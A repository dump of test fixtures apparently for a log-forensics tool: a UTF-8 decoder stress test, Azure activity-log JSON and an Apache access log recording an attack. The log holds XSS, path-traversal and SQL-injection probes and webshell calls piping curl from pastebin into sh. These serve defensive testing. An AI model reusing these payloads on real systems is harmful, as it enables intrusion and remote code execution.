U+0000 = e0 80 80 = "���" | 236 | 4.3.3 U+0000 = f0 80 80 80 = "����" | 237 | 4.3.4 U+0000 = f8 80 80 80 80 = "�����" | 238 | 4.3.5 U+0000 = fc 80 80 80 80 80 = "������" | 239 | | 240 | 5 Illegal code positions | 241 | | 242 | The following UTF-8 sequences should be rejected like malformed | 243 | sequences, because they never represent valid ISO 10646 characters and | 244 | a UTF-8 decoder that accepts them might introduce security problems | 245 | comparable to overlong UTF-8 sequences. | 246 | | 247 | 5.1 Single UTF-16 surrogates | 248 | | 249 | 5.1.1 U+D800 = ed a0 80 = "���" | 250 | 5.1.2 U+DB7F = ed ad bf = "���" | 251 | 5.1.3 U+DB80 = ed ae 80 = "���" | 252 | 5.1.4 U+DBFF = ed af bf = "���" | 253 | 5.1.5 U+DC00 = ed b0 80 = "���" | 254 | 5.1.6 U+DF80 = ed be 80 = "���" | 255 | 5.1.7 U+DFFF = ed bf bf = "���" | 256 | | 257 | 5.2 Paired UTF-16 surrogates | 258 | | 259 | 5.2.1 U+D800 U+DC00 = ed a0 80 ed b0 80 = "������" | 260 | 5.2.2 U+D800 U+DFFF = ed a0 80 ed bf bf = "������" | 261 | 5.2.3 U+DB7F U+DC00 = ed ad bf ed b0 80 = "������" | 262 | 5.2.4 U+DB7F U+DFFF = ed ad bf ed bf bf = "������" | 263 | 5.2.5 U+DB80 U+DC00 = ed ae 80 ed b0 80 = "������" | 264 | 5.2.6 U+DB80 U+DFFF = ed ae 80 ed bf bf = "������" | 265 | 5.2.7 U+DBFF U+DC00 = ed af bf ed b0 80 = "������" | 266 | 5.2.8 U+DBFF U+DFFF = ed af bf ed bf bf = "������" | 267 | | 268 | 5.3 Noncharacter code positions | 269 | | 270 | The following "noncharacters" are "reserved for internal use" by | 271 | applications, and according to older versions of the Unicode Standard | 272 | "should never be interchanged". Unicode Corrigendum #9 dropped the | 273 | latter restriction. Nevertheless, their presence in incoming UTF-8 data | 274 | can remain a potential security risk, depending on what use is made of | 275 | these codes subsequently. Examples of such internal use: | 276 | | 277 | - Some file APIs with 16-bit characters may use the integer value -1 | 278 | = U+FFFF to signal an end-of-file (EOF) or error condition. | 279 | | 280 | - In some UTF-16 receivers, code point U+FFFE might trigger a | 281 | byte-swap operation (to convert between UTF-16LE and UTF-16BE). | 282 | | 283 | With such internal use of noncharacters, it may be desirable and safer | 284 | to block those code points in UTF-8 decoders, as they should never | 285 | occur legitimately in incoming UTF-8 data, and could trigger unsafe | 286 | behaviour in subsequent processing. | 287 | | 288 | Particularly problematic noncharacters in 16-bit applications: | 289 | | 290 | 5.3.1 U+FFFE = ef bf be = "￾" | 291 | 5.3.2 U+FFFF = ef bf bf = "￿" | 292 | | 293 | Other noncharacters: | 294 | | 295 | 5.3.3 U+FDD0 .. U+FDEF = "﷐﷑﷒﷓﷔﷕﷖﷗﷘﷙﷚﷛﷜﷝﷞﷟﷠﷡﷢﷣﷤﷥﷦﷧﷨﷩﷪﷫﷬﷭﷮﷯"| 296 | | 297 | 5.3.4 U+nFFFE U+nFFFF (for n = 1..10) | 298 | | 299 | "🿾🿿𯿾𯿿𿿾𿿿񏿾񏿿񟿾񟿿񯿾񯿿񿿾񿿿򏿾򏿿 | 300 | 򟿾򟿿򯿾򯿿򿿾򿿿󏿾󏿿󟿾󟿿󯿾󯿿󿿾󿿿􏿾􏿿" | 301 | | 302 | THE END | 303 | -------------------------------------------------------------------------------- /tests/data/UTF-8-test_filename_ŀĔ_TH̘Ë͖́̉ ͠P̯͍̭O̚​N̐Y̡ H̸̡̪̯ͨ͊̽̅̾̎Ȩ̬̩̾͛ͪ̈́̀́͘ ̶̧̨̱̹̭̯ͧ̾ͬC̷̙̲̝͖ͭ̏ͥͮ͟Oͮ͏̮̪̝͍M̲̖͊̒ͪͩͬ̚̚͜Ȇ̴̟̟͙̞ͩ͌͝S̨̥̫͎̭ͯ̿̔̀ͅ.txt: -------------------------------------------------------------------------------- 1 | 2021-07-07T16:46:30.000ZUTF-8 decoder capability and stress test INFO Starting up agent subsystem INFO [ssm-session-worker]User name,AWS access key,Event time"serviceName": "guardduty""schemaVersion" 2 | ---------------------------------------- 3 | 4 | 5 | You can't parse [X]HTML with regex. Because HTML can't be parsed by regex. Regex is not a tool that can be used to correctly parse HTML. As I have answered in HTML-and-regex questions here so many times before, the use of regex will not allow you to consume HTML. Regular expressions are a tool that is insufficiently sophisticated to understand the constructs employed by HTML. HTML is not a regular language and hence cannot be parsed by regular expressions. Regex queries are not equipped to break down HTML into its meaningful parts. so many times but it is not getting to me. Even enhanced irregular regular expressions as used by Perl are not up to the task of parsing HTML. You will never make me crack. HTML is a language of sufficient complexity that it cannot be parsed by regular expressions. Even Jon Skeet cannot parse HTML using regular expressions. Every time you attempt to parse HTML with regular expressions, the unholy child weeps the blood of virgins, and Russian hackers pwn your webapp. Parsing HTML with regex summons tainted souls into the realm of the living. HTML and regex go together like love, marriage, and ritual infanticide. The
cannot hold it is too late. The force of regex and HTML together in the same conceptual space will destroy your mind like so much watery putty. If you parse HTML with regex you are giving in to Them and their blasphemous ways which doom us all to inhuman toil for the One whose Name cannot be expressed in the Basic Multilingual Plane, he comes. HTML-plus-regexp will liquify the n​erves of the sentient whilst you observe, your psyche withering in the onslaught of horror. Rege̿̔̉x-based HTML parsers are the cancer that is killing StackOverflow it is too late it is too late we cannot be saved the transgression of a chi͡ld ensures regex will consume all living tissue (except for HTML which it cannot, as previously prophesied) dear lord help us how can anyone survive this scourge using regex to parse HTML has doomed humanity to an eternity of dread torture and security holes using regex as a tool to process HTML establishes a breach between this world and the dread realm of c͒ͪo͛ͫrrupt entities (like SGML entities, but more corrupt) a mere glimpse of the world of reg​ex parsers for HTML will ins​tantly transport a programmer's consciousness into a world of ceaseless screaming, he comes, the pestilent slithy regex-infection wil​l devour your HT​ML parser, application and existence for all time like Visual Basic only worse he comes he comes do not fi​ght he com̡e̶s, ̕h̵i​s un̨ho͞ly radiańcé destro҉ying all enli̍̈́̂̈́ghtenment, HTML tags lea͠ki̧n͘g fr̶ǫm ̡yo​͟ur eye͢s̸ ̛l̕ik͏e liq​uid pain, the song of re̸gular exp​ression parsing will exti​nguish the voices of mor​tal man from the sp​here I can see it can you see ̲͚̖͔̙î̩́t̲͎̩̱͔́̋̀ it is beautiful t​he final snuffing of the lie​s of Man ALL IS LOŚ͖̩͇̗̪̏̈́T ALL I​S LOST the pon̷y he comes he c̶̮omes he comes the ich​or permeates all MY FACE MY FACE ᵒh god no NO NOO̼O​O NΘ stop the an​*̶͑̾̾​̅ͫ͏̙̤g͇̫͛͆̾ͫ̑͆l͖͉̗̩̳̟̍ͫͥͨe̠̅s ͎a̧͈͖r̽̾̈́͒͑e n​ot rè̑ͧ̌aͨl̘̝̙̃ͤ͂̾̆ ZA̡͊͠͝LGΌ ISͮ̂҉̯͈͕̹̘̱ TO͇̹̺ͅƝ̴ȳ̳ TH̘Ë͖́̉ ͠P̯͍̭O̚​N̐Y̡ H̸̡̪̯ͨ͊̽̅̾̎Ȩ̬̩̾͛ͪ̈́̀́͘ ̶̧̨̱̹̭̯ͧ̾ͬC̷̙̲̝͖ͭ̏ͥͮ͟Oͮ͏̮̪̝͍M̲̖͊̒ͪͩͬ̚̚͜Ȇ̴̟̟͙̞ͩ͌͝S̨̥̫͎̭ͯ̿̔̀ͅ 6 | Markus Kuhn - 2015-08-28 - CC BY 4.0 7 | 8 | This test file can help you examine, how your UTF-8 decoder handles 9 | various types of correct, malformed, or otherwise interesting UTF-8 10 | sequences. This file is not meant to be a conformance test. It does 11 | not prescribe any particular outcome. Therefore, there is no way to 12 | "pass" or "fail" this test file, even though the text does suggest a 13 | preferable decoder behaviour at some places. Its aim is, instead, to 14 | help you think about, and test, the behaviour of your UTF-8 decoder on a 15 | systematic collection of unusual inputs. Experience so far suggests 16 | that most first-time authors of UTF-8 decoders find at least one 17 | serious problem in their decoder using this file. 18 | 19 | The test lines below cover boundary conditions, malformed UTF-8 20 | sequences, as well as correctly encoded UTF-8 sequences of Unicode code 21 | points that should never occur in a correct UTF-8 file. 22 | 23 | According to ISO 10646-1:2000, sections D.7 and 2.3c, a device 24 | receiving UTF-8 shall interpret a "malformed sequence in the same way 25 | that it interprets a character that is outside the adopted subset" and 26 | "characters that are not within the adopted subset shall be indicated 27 | to the user" by a receiving device. One commonly used approach in 28 | UTF-8 decoders is to replace any malformed UTF-8 sequence by a 29 | replacement character (U+FFFD), which looks a bit like an inverted 30 | question mark, or a similar symbol. It might be a good idea to 31 | visually distinguish a malformed UTF-8 sequence from a correctly 32 | encoded Unicode character that is just not available in the current 33 | font but otherwise fully legal, even though ISO 10646-1 doesn't 34 | mandate this. In any case, just ignoring malformed sequences or 35 | unavailable characters does not conform to ISO 10646, will make 36 | debugging more difficult, and can lead to user confusion. 37 | 38 | Please check, whether a malformed UTF-8 sequence is (1) represented at 39 | all, (2) represented by exactly one single replacement character (or 40 | equivalent signal), and (3) the following quotation mark after an 41 | illegal UTF-8 sequence is correctly displayed, i.e. proper 42 | resynchronization takes place immediately after any malformed 43 | sequence. This file says "THE END" in the last line, so if you don't 44 | see that, your decoder crashed somehow before, which should always be 45 | cause for concern. 46 | 47 | All lines in this file are exactly 79 characters long (plus the line 48 | feed). In addition, all lines end with "|", except for the two test 49 | lines 2.1.1 and 2.2.1, which contain non-printable ASCII controls 50 | U+0000 and U+007F. If you display this file with a fixed-width font, 51 | these "|" characters should all line up in column 79 (right margin). 52 | This allows you to test quickly, whether your UTF-8 decoder finds the 53 | correct number of characters in every line, that is whether each 54 | malformed sequences is replaced by a single replacement character. 55 | 56 | Note that, as an alternative to the notion of malformed sequence used 57 | here, it is also a perfectly acceptable (and in some situations even 58 | preferable) solution to represent each individual byte of a malformed 59 | sequence with a replacement character. If you follow this strategy in 60 | your decoder, then please ignore the "|" column. 61 | 62 | 63 | Here come the tests: | 64 | | 65 | 1 Some correct UTF-8 text | 66 | | 67 | You should see the Greek word 'kosme': "κόσμε" | 68 | | 69 | 2 Boundary condition test cases | 70 | | 71 | 2.1 First possible sequence of a certain length | 72 | | 73 | 2.1.1 1 byte (U-00000000): " -------------------------------------------------------------------------------- /tests/data/apache_access.log: -------------------------------------------------------------------------------- 1 | 86.166.103.163 - - [19/Jul/2020:20:14:39 +0000] "GET / HTTP/1.1" 200 3380 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36" 2 | 86.166.103.163 - - [19/Jul/2020:20:14:39 +0000] "GET /icons/openlogo-75.png HTTP/1.1" 200 6040 "http://ec2-3-90-82-218.compute-1.amazonaws.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36" 3 | 86.166.103.163 - - [19/Jul/2020:20:14:39 +0000] "GET /favicon.ico HTTP/1.1" 404 517 "http://ec2-3-90-82-218.compute-1.amazonaws.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36" 4 | 86.166.103.163 - - [19/Jul/2020:20:16:34 +0000] "GET / HTTP/1.1" 200 3380 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36" 5 | 86.166.103.163 - - [19/Jul/2020:20:16:37 +0000] "GET /test.php HTTP/1.1" 200 204 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36" 6 | 86.166.103.163 - - [19/Jul/2020:20:39:04 +0000] "GET / HTTP/1.1" 200 3380 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36" 7 | 40.76.227.225 - - [19/Jul/2020:20:39:21 +0000] "GET / HTTP/1.1" 200 3380 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36" 8 | 40.76.227.225 - - [19/Jul/2020:20:39:22 +0000] "GET /wp-links-opml.php?user-agent=Mozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10_11_6%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F53.0.2785.143+Safari%2F537.36 HTTP/1.1" 500 185 "-" "python-requests/2.23.0" 9 | 40.76.227.225 - - [19/Jul/2020:20:39:22 +0000] "GET /wp-content/themes/???/style.css HTTP/1.1" 200 203 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36" 10 | 45.76.91.240 - - [19/Jul/2020:20:39:27 +0000] "HEAD / HTTP/1.1" 200 255 "-" "-" 11 | 54.165.221.210 - - [19/Jul/2020:20:39:33 +0000] "GET / HTTP/1.1" 200 3324 "https://sucuri.net" "Mozilla/5.0 SomeLine (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" 12 | 54.165.221.210 - - [19/Jul/2020:20:39:33 +0000] "TRACE / HTTP/1.1" 405 506 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36" 13 | 54.165.221.210 - - [19/Jul/2020:20:39:33 +0000] "GET /.git/HEAD HTTP/1.1" 404 462 "https://sucuri.net" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" 14 | 54.165.221.210 - - [19/Jul/2020:20:39:33 +0000] "GET /404javascript.js HTTP/1.1" 404 462 "https://www.google.com/url/?sa=t" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" 15 | 54.165.221.210 - - [19/Jul/2020:20:39:33 +0000] "GET /404testpage4525d2fdc HTTP/1.1" 404 462 "https://sucuri.net" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko" 16 | 54.165.221.210 - - [19/Jul/2020:20:39:33 +0000] "GET / HTTP/1.1" 200 3324 "https://www.google.com/images/url" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 17 | 54.165.221.210 - - [19/Jul/2020:20:39:33 +0000] "GET /manual HTTP/1.1" 404 462 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 18 | 54.165.221.210 - - [19/Jul/2020:20:39:33 +0000] "GET / HTTP/1.1" 200 3324 "-" "Mozilla/5.0 (iPad; CPU OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" 19 | 209.250.238.112 - - [19/Jul/2020:20:39:46 +0000] "GET / HTTP/1.1" 200 3324 "http://ec2-3-90-82-218.compute-1.amazonaws.com/" "Mozilla/5.0 (compatible; WPSec/1.3; +https://wpsec.com)" 20 | 209.250.238.112 - - [19/Jul/2020:20:39:46 +0000] "GET / HTTP/1.1" 200 3324 "http://ec2-3-90-82-218.compute-1.amazonaws.com/" "Mozilla/5.0 (compatible; WPSec/1.3; +https://wpsec.com)" 21 | 209.250.238.112 - - [19/Jul/2020:20:39:46 +0000] "HEAD / HTTP/1.1" 200 283 "http://ec2-3-90-82-218.compute-1.amazonaws.com/" "Mozilla/5.0 (compatible; WPSec/1.3; +https://wpsec.com)" 22 | 209.250.238.112 - - [19/Jul/2020:20:39:46 +0000] "GET /2d1983f.html HTTP/1.1" 404 462 "http://ec2-3-90-82-218.compute-1.amazonaws.com/" "Mozilla/5.0 (compatible; WPSec/1.3; +https://wpsec.com)" 23 | 209.250.238.112 - - [19/Jul/2020:20:39:46 +0000] "HEAD /wp-content/ HTTP/1.1" 200 128 "http://ec2-3-90-82-218.compute-1.amazonaws.com/" "Mozilla/5.0 (compatible; WPSec/1.3; +https://wpsec.com)" 24 | 209.250.238.112 - - [19/Jul/2020:20:40:00 +0000] "GET / HTTP/1.1" 200 3380 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3770.100 Safari/537.36" 25 | 209.250.238.112 - - [19/Jul/2020:20:40:00 +0000] "GET /?a=%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E&c=..%2F..%2F..%2F..%2Fetc%2Fpasswd&b=UNION+SELECT+ALL+FROM+information_schema+AND+%27+or+SLEEP%285%29+or+%27 HTTP/1.1" 200 3380 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3770.100 Safari/537.36" 26 | 209.250.238.112 - - [19/Jul/2020:20:40:00 +0000] "GET / HTTP/1.1" 200 3380 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3770.100 Safari/537.36" 27 | 209.250.238.112 - - [19/Jul/2020:20:40:01 +0000] "GET / HTTP/1.1" 200 3380 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3770.100 Safari/537.36" 28 | 209.250.238.112 - - [19/Jul/2020:20:40:01 +0000] "GET /?s=%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E HTTP/1.1" 200 3380 "-" "python-requests/2.22.0" 29 | 209.250.238.112 - - [19/Jul/2020:20:40:01 +0000] "GET / HTTP/1.1" 200 3380 "-" "python-requests/2.22.0" 30 | 209.250.238.112 - - [19/Jul/2020:20:40:01 +0000] "GET /?s=UNION+SELECT+ALL+FROM+information_schema+AND+%27+or+SLEEP%285%29+or+%27 HTTP/1.1" 200 3380 "-" "python-requests/2.22.0" 31 | 185.220.101.194 - - [19/Jul/2020:20:40:41 +0000] "GET / HTTP/1.1" 200 3380 "-" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 32 | 185.220.101.194 - - [19/Jul/2020:20:40:41 +0000] "GET /icons/openlogo-75.png HTTP/1.1" 200 6040 "http://ec2-3-90-82-218.compute-1.amazonaws.com/" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 33 | 185.220.101.194 - - [19/Jul/2020:20:40:41 +0000] "GET /favicon.ico HTTP/1.1" 404 518 "-" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 34 | 185.220.101.194 - - [19/Jul/2020:20:41:24 +0000] "GET /wp-content HTTP/1.1" 301 666 "-" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 35 | 185.220.101.194 - - [19/Jul/2020:20:41:25 +0000] "GET /wp-content/ HTTP/1.1" 200 736 "-" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 36 | 185.220.101.194 - - [19/Jul/2020:20:41:25 +0000] "GET /icons/blank.gif HTTP/1.1" 200 431 "http://ec2-3-90-82-218.compute-1.amazonaws.com/wp-content/" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 37 | 185.220.101.194 - - [19/Jul/2020:20:41:25 +0000] "GET /icons/back.gif HTTP/1.1" 200 500 "http://ec2-3-90-82-218.compute-1.amazonaws.com/wp-content/" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 38 | 185.220.101.194 - - [19/Jul/2020:20:41:25 +0000] "GET /icons/folder.gif HTTP/1.1" 200 509 "http://ec2-3-90-82-218.compute-1.amazonaws.com/wp-content/" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 39 | 185.220.101.194 - - [19/Jul/2020:20:41:27 +0000] "GET /wp-content/plugins/ HTTP/1.1" 200 787 "http://ec2-3-90-82-218.compute-1.amazonaws.com/wp-content/" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 40 | 185.220.101.194 - - [19/Jul/2020:20:41:27 +0000] "GET /icons/unknown.gif HTTP/1.1" 200 528 "http://ec2-3-90-82-218.compute-1.amazonaws.com/wp-content/plugins/" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 41 | 185.220.101.194 - - [19/Jul/2020:20:41:29 +0000] "GET /wp-content/plugins/wordpress_uploader.php HTTP/1.1" 200 480 "http://ec2-3-90-82-218.compute-1.amazonaws.com/wp-content/plugins/" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 42 | 185.220.101.194 - - [19/Jul/2020:20:42:18 +0000] "POST /wp-content/plugins/wordpress_uploader.php HTTP/1.1" 200 494 "http://ec2-3-90-82-218.compute-1.amazonaws.com/wp-content/plugins/wordpress_uploader.php" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 43 | 185.220.101.194 - - [19/Jul/2020:20:42:24 +0000] "POST /wp-content/plugins/wordpress_uploader.php HTTP/1.1" 200 494 "http://ec2-3-90-82-218.compute-1.amazonaws.com/wp-content/plugins/wordpress_uploader.php" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 44 | 185.220.101.194 - - [19/Jul/2020:20:42:30 +0000] "POST /wp-content/plugins/wordpress_uploader.php HTTP/1.1" 200 499 "http://ec2-3-90-82-218.compute-1.amazonaws.com/wp-content/plugins/wordpress_uploader.php" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 45 | 185.220.101.194 - - [19/Jul/2020:20:42:34 +0000] "POST /wp-content/plugins/wordpress_uploader.php HTTP/1.1" 200 504 "http://ec2-3-90-82-218.compute-1.amazonaws.com/wp-content/plugins/wordpress_uploader.php" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 46 | 185.220.101.194 - - [19/Jul/2020:20:43:04 +0000] "GET /wp-content/plugins/uploads HTTP/1.1" 301 698 "-" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 47 | 185.220.101.194 - - [19/Jul/2020:20:43:05 +0000] "GET /wp-content/plugins/uploads/ HTTP/1.1" 200 792 "-" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 48 | 185.220.101.194 - - [19/Jul/2020:20:43:05 +0000] "GET /icons/text.gif HTTP/1.1" 200 512 "http://ec2-3-90-82-218.compute-1.amazonaws.com/wp-content/plugins/uploads/" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 49 | 185.220.101.194 - - [19/Jul/2020:20:43:05 +0000] "GET /icons/image2.gif HTTP/1.1" 200 594 "http://ec2-3-90-82-218.compute-1.amazonaws.com/wp-content/plugins/uploads/" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 50 | 185.220.101.194 - - [19/Jul/2020:20:43:07 +0000] "GET /wp-content/plugins/uploads/a.php HTTP/1.1" 200 384 "http://ec2-3-90-82-218.compute-1.amazonaws.com/wp-content/plugins/uploads/" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 51 | 185.220.101.194 - - [19/Jul/2020:20:43:07 +0000] "GET /wp-content/plugins/uploads/a.php HTTP/1.1" 200 384 "http://ec2-3-90-82-218.compute-1.amazonaws.com/wp-content/plugins/uploads/" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 52 | 185.220.101.194 - - [19/Jul/2020:20:43:45 +0000] "GET /wp-content/plugins/uploads/a.php?cmd=curl%20https://pastebin.com/raw/NKnTWdsk%20|%20sh HTTP/1.1" 200 392 "-" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 53 | 185.220.101.194 - - [19/Jul/2020:20:44:08 +0000] "GET /wp-content/plugins/uploads/a.php?cmd=curl%20http://pastebin.com/raw/rsdzW7C7%20|%20sh HTTP/1.1" 200 392 "-" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 54 | 185.220.101.194 - - [19/Jul/2020:20:46:20 +0000] "GET / HTTP/1.1" 200 3380 "-" "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0" 55 | -------------------------------------------------------------------------------- /tests/data/azure.json: -------------------------------------------------------------------------------- 1 | [ 2 | { 3 | "data": { 4 | "authorization": { 5 | "action": "Microsoft.Storage/storageAccounts/listKeys/action", 6 | "scope": "/subscriptions/ji12gbh3jh12b3h12vb3hv123h/resourceGroups/test/providers/Microsoft.Storage/storageAccounts/storagetest" 7 | }, 8 | "caller": "test@email", 9 | "channels": "Operation", 10 | "claims": { 11 | "aud": "https://management.core.windows.net/", 12 | "ver": "1.0", 13 | "xms_cae": "1", 14 | "xms_tcdt": "1231293743" 15 | }, 16 | "correlationId": "b12321j3bhdgscj214j3b12rhv", 17 | "description": "", 18 | "eventDataId": "21371283ghjgfsdb9876123", 19 | "eventName": { 20 | "value": "EndRequest", 21 | "localizedValue": "End request" 22 | }, 23 | "httpRequest": { 24 | "clientRequestId": "9dsfghj1290-381293ghu123gvh123", 25 | "clientIpAddress": "11.11.11.10", 26 | "method": "POST", 27 | "uri": "https://management.azure.com/subscriptions/12937812uhg3uhj2qwgrfbhsdfgb138294e12ugv/resourceGroups/Test/providers/Microsoft.Storage/storageAccounts/storagetest/listKeys?api-version=2022-05-01" 28 | }, 29 | "id": "/subscriptions/12937812uhg3uhj2qwgrfbhsdfgb138294e12ugv/resourceGroups/Test/providers/Microsoft.Storage/storageAccounts/storagetest/events/21371283ghjgfsdb9876123/ticks/2193871283612873612", 30 | "level": "Informational", 31 | "resourceGroupName": "Test", 32 | "resourceProviderName": { 33 | "value": "Microsoft.Storage", 34 | "localizedValue": "Microsoft.Storage" 35 | }, 36 | "resourceId": "/subscriptions/12937812uhg3uhj2qwgrfbhsdfgb138294e12ugv/resourceGroups/Test/providers/Microsoft.Storage/storageAccounts/storagetest", 37 | "operationId": "ac8a903f-315d-421a-8533-84ed10b356cd", 38 | "operationName": { 39 | "value": "Microsoft.Storage/storageAccounts/listKeys/action", 40 | "localizedValue": "List Storage Account Keys" 41 | }, 42 | "status": { 43 | "value": "Succeeded", 44 | "localizedValue": "Succeeded" 45 | }, 46 | "subStatus": { 47 | "value": "OK", 48 | "localizedValue": "OK (HTTP Status Code: 200)" 49 | }, 50 | "tenantId": "12321MN3BNDASVBfD09SFDGSD" 51 | }, 52 | "version": 1, 53 | "eventId": "21371283ghjgfsdb9876123", 54 | "eventType": "AZURE_CLOUD" 55 | } 56 | ] -------------------------------------------------------------------------------- /tests/data/azure_singleline.json: -------------------------------------------------------------------------------- 1 | [ 2 | { 3 | "data": { 4 | "authorization": { 5 | "action": "Microsoft.Storage/storageAccounts/listKeys/action", 6 | "scope": "/subscriptions/ji12gbh3jh12b3h12vb3hv123h/resourceGroups/test/providers/Microsoft.Storage/storageAccounts/storagetest" 7 | }, 8 | "caller": "test@email", 9 | "channels": "Operation", 10 | "claims": { 11 | "aud": "https://management.core.windows.net/", 12 | "ver": "1.0", 13 | "xms_cae": "1", 14 | "xms_tcdt": "1231293743" 15 | }, 16 | "correlationId": "b12321j3bhdgscj214j3b12rhv", 17 | "description": "", 18 | "eventDataId": "21371283ghjgfsdb9876123", 19 | "eventName": { 20 | "value": "EndRequest", 21 | "localizedValue": "End request" 22 | }, 23 | "httpRequest": { 24 | "clientRequestId": "9dsfghj1290-381293ghu123gvh123", 25 | "clientIpAddress": "11.11.11.10", 26 | "method": "POST", 27 | "uri": "https://management.azure.com/subscriptions/12937812uhg3uhj2qwgrfbhsdfgb138294e12ugv/resourceGroups/Test/providers/Microsoft.Storage/storageAccounts/storagetest/listKeys?api-version=2022-05-01" 28 | }, 29 | "id": "/subscriptions/12937812uhg3uhj2qwgrfbhsdfgb138294e12ugv/resourceGroups/Test/providers/Microsoft.Storage/storageAccounts/storagetest/events/21371283ghjgfsdb9876123/ticks/2193871283612873612", 30 | "level": "Informational", 31 | "resourceGroupName": "Test", 32 | "resourceProviderName": { 33 | "value": "Microsoft.Storage", 34 | "localizedValue": "Microsoft.Storage" 35 | }, 36 | "resourceId": "/subscriptions/12937812uhg3uhj2qwgrfbhsdfgb138294e12ugv/resourceGroups/Test/providers/Microsoft.Storage/storageAccounts/storagetest", 37 | "operationId": "ac8a903f-315d-421a-8533-84ed10b356cd", 38 | "operationName": { 39 | "value": "Microsoft.Storage/storageAccounts/listKeys/action", 40 | "localizedValue": "List Storage Account Keys" 41 | }, 42 | "status": { 43 | "value": "Succeeded", 44 | "localizedValue": "Succeeded" 45 | }, 46 | "subStatus": { 47 | "value": "OK", 48 | "localizedValue": "OK (HTTP Status Code: 200)" 49 | }, 50 | "tenantId": "12321MN3BNDASVBfD09SFDGSD" 51 | }, 52 | "version": 1, 53 | "eventId": "21371283ghjgfsdb9876123", 54 | "eventType": "AZURE_CLOUD" 55 | } 56 | ] -------------------------------------------------------------------------------- /tests/data/bad_azure.json: -------------------------------------------------------------------------------- 1 | [ 2 | { 3 | "data": { 4 | "authorization": { 5 | "action": "Microsoft.Storage/storageAccounts/listKeys/action", 6 | "scope": "/subscriptions/ji12gbh3jh12b3h12vb3hv123h/resourceGroups/test/providers/Microsoft.Storage/storageAccounts/storagetest" 7 | }, 8 | 